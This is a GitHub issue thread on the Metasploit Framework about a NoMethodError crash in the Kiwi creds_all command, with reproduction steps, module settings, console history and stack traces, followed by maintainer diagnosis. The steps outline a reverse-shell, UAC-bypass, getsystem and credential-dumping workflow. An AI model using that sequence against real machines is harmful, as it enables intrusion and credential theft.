### ISSUE TITLE
Kiwi (creds_all) returns "Error running command creds_all: NoMethodError undefined method `id' for nil:NilClass"

### ISSUE THREAD

**Issue by FerdinandoPH** [rapid7/metasploit-framework#15689]
## Steps to reproduce

How'd you do it?

1: Load a  x64 meterpreter session with windows/x64/meterpreter/reverse_tcp
2: Get system priviledges with bypassuac and getsystem
3: Load kiwi
4: Run creds_all

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Were you following a specific guide/tutorial or reading documentation?

No

## Expected behavior

What should happen?
The command should run properly and return the credentials

## Current behavior

What happens instead?

This error appears: Error running command creds_all: NoMethodError undefined method `id' for nil:NilClass

### Metasploit version
6.1.5-dev
Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).

## Additional Information
If your version is less than `5.0.96`, please update to the latest version and ensure your issue is still present.

##  Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:
<details>
<summary>Collapse</summary>

```
[framework/ui/console]
ActiveModule=exploit/windows/local/bypassuac

[windows/local/bypassuac]
WORKSPACE=
VERBOSE=false
WfsDelay=2
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
SESSION=2
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
Powershell::persist=false
Powershell::prepend_sleep=
Powershell::prepend_protections_bypass=true
Powershell::strip_comments=true
Powershell::strip_whitespace=false
Powershell::sub_vars=true
Powershell::sub_funcs=false
Powershell::exec_in_place=false
Powershell::exec_rc4=false
Powershell::remove_comspec=false
Powershell::noninteractive=true
Powershell::encode_final_payload=false
Powershell::encode_inner_payload=false
Powershell::wrap_double_quotes=true
Powershell::no_equals=false
Powershell::method=reflection
TECHNIQUE=EXE
PAYLOAD=windows/x64/meterpreter/reverse_tcp
LHOST=192.168.1.164
LPORT=4444
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PingbackRetries=0
PingbackSleep=30
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
EnableStageEncoding=false
StageEncoder=
StageEncoderSaveRegisters=
StageEncodingFallback=true
PrependMigrate=false
PrependMigrateProc=
EXITFUNC=process
PayloadBindPort=
AutoLoadStdapi=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
target=1
loglevel=3
```

</details>

##  History

The following commands were ran during the session and before this issue occurred:
<details>
<summary>Collapse</summary>

```
175    use exploit/multi/handler
176    set payload windows/x64/meterpreter/reverse_tcp
177    options
178    set lhost 192.168.1.164
179    run
180    search bypassuac
181    use 2
182    set payload windows/x64/meterpeter/reverse_tcp
183    options
184    set session 2
185    set target 1
186    set payload windows/x64/meterpreter/reverse_tcp
187    options
188    run
189    set loglevel 3
190    debug
```

</details>

##  Framework Errors

The following framework errors occurred before the issue occurred:
<details>
<summary>Collapse</summary>

```
[09/18/2021 21:41:13] [e(0)] core: Exploit failed (multi/handler): Interrupt  - Interrupt 
[09/18/2021 21:42:45] [e(0)] meterpreter: priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
[09/18/2021 21:42:54] [e(0)] core: Technique: 0) - Rex::Post::Meterpreter::RequestError priv_elevate_getsystem: Operation failed: This function is not supported on this system.
[09/18/2021 21:47:29] [e(0)] meterpreter: priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
[09/19/2021 09:33:54] [e(0)] core: Module ecploit/multi/handler not found, and no loading errors found. If you're using a custom module refer to our wiki: https://github.com/rapid7/metasploit-framework/wiki/Running-Private-Modules
[09/19/2021 09:42:20] [e(0)] meterpreter: Failed to load extension: No module of the name kiwi_x64 found
[09/19/2021 09:54:25] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () >
[09/19/2021 09:57:20] [e(0)] meterpreter: Error running command creds_all: NoMethodError undefined method `id' for nil:NilClass
[09/19/2021 09:58:20] [e(0)] meterpreter: Error running command creds_all: NoMethodError undefined method `id' for nil:NilClass
[09/19/2021 10:01:52] [e(0)] meterpreter: Error running command creds_all: NoMethodError undefined method `id' for nil:NilClass
```

</details>

##  Web Service Errors

The following web service errors occurred before the issue occurred:
<details>
<summary>Collapse</summary>

```
msf-ws.log does not exist.
```

</details>

##  Framework Logs

The following framework logs were recorded before the issue occurred:
<details>
<summary>Collapse</summary>

```
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[09/19/2021 10:01:23] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (5)
[09/19/2021 10:01:24] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (5)
[09/19/2021 10:01:52] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (5)
[09/19/2021 10:01:52] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (5)
[09/19/2021 10:01:52] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (5)
[09/19/2021 10:01:52] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (5)
[09/19/2021 10:01:52] [e(0)] meterpreter: Error running command creds_all: NoMethodError undefined method `id' for nil:NilClass
[09/19/2021 10:01:52] [d(0)] meterpreter: Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb:684:in `report_creds'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb:624:in `block (2 levels) in scrape_passwords'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb:607:in `each'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb:607:in `block in scrape_passwords'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb:584:in `each'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb:584:in `scrape_passwords'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb:467:in `cmd_creds_all'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:557:in `run_command'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:102:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `run_single'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:64:in `block in interact'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:157:in `run'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:62:in `interact'
/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:555:in `_interact'
/usr/share/metasploit-framework/lib/rex/ui/interactive.rb:53:in `interact'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1543:in `cmd_sessions'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:557:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `run_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:187:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:557:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[09/19/2021 10:09:37] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (5)
[09/19/2021 10:09:41] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (5)
[09/19/2021 10:09:41] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (5)
[09/19/2021 10:09:41] [d(0)] core: HistoryManager.pop_context name: :meterpreter
```

</details>

##  Web Service Logs

The following web service logs were recorded before the issue occurred:
<details>
<summary>Collapse</summary>

```
msf-ws.log does not exist.
```

</details>

##  Version/Install

The versions and install method of your Metasploit setup:
<details>
<summary>Collapse</summary>

```
Framework: 6.1.5-dev
Ruby: ruby 2.7.4p191 (2021-07-07 revision a21a3b7d23) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql.
Install Method: Other - Please specify
```

</details>

**Comment by friedrico** [comment]
same here using `windows/meterpreter/reverse_tcp` on
```
sysinfo 
Computer        : WIN10
OS              : Windows 10 (10.0 Build 10586).
Architecture    : x64
System Language : en_US
Domain          : ...
Logged On Users : 4
Meterpreter     : x64/windows
```

**Comment by adfoster-r7** [comment]
I haven't been able to replicate this crash; Although the stacktrace is hinting at your session opening without correctly being assigned a database entry:
```
[09/19/2021 10:01:52] [e(0)] meterpreter: Error running command creds_all: NoMethodError undefined method `id' for nil:NilClass
[09/19/2021 10:01:52] [d(0)] meterpreter: Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb:684:in `report_creds'
/
```

Corresponding code:
https://github.com/rapid7/metasploit-framework/blob/b11237fea02f1c7a6776e35fedb6fb5df70a1033/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb#L684

This log message confirms it as well:
> [09/19/2021 10:01:23] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (5)

I can put in a fix to stop the crash, but I'd be interesting to work out how there was no `db_record` assigned to the session. Are you using session persistence, or connecting to a different database when msfconsole is open, or anything like that? 🤔 

Is the issue consistent? i.e. if you close and reopen msfconsole and run through the same steps, does the same error always appear, or is it occasionally happening?

**Comment by fmtbkgiddiqq** [comment]
I reproduced this error under the following conditions on a fresh kali rolling VPS

Framework: 6.1.14-dev
Console  : 6.1.14-dev

[-] Error while running command jobs: undefined method `listener' for nil:NilClass
Call stack:
/usr/share/metasploit-framework/lib/msf/core/handler/reverse_http.rb:162:in `comm_string'
/usr/share/metasploit-framework/lib/msf/base/serializer/readable_text.rb:1006:in `block in dump_jobs'
/usr/share/metasploit-framework/lib/msf/base/serializer/readable_text.rb:980:in `each'
/usr/share/metasploit-framework/lib/msf/base/serializer/readable_text.rb:980:in `dump_jobs'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/jobs.rb:175:in `cmd_jobs'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:562:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:511:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:505:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:505:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'

The error only seemed to occur upon first use. I could not reproduce the error on the same box afterwards.

**Comment by gifrate** [comment]
I have the same issue as above on version 6.1.14-dev. with both hashdump and creds-all within meterpreter.

It seems the sessions are not added to the database. I am also using a workspace if that helps.

**Comment by gwillcox-r7** [comment]
Closed with #15957
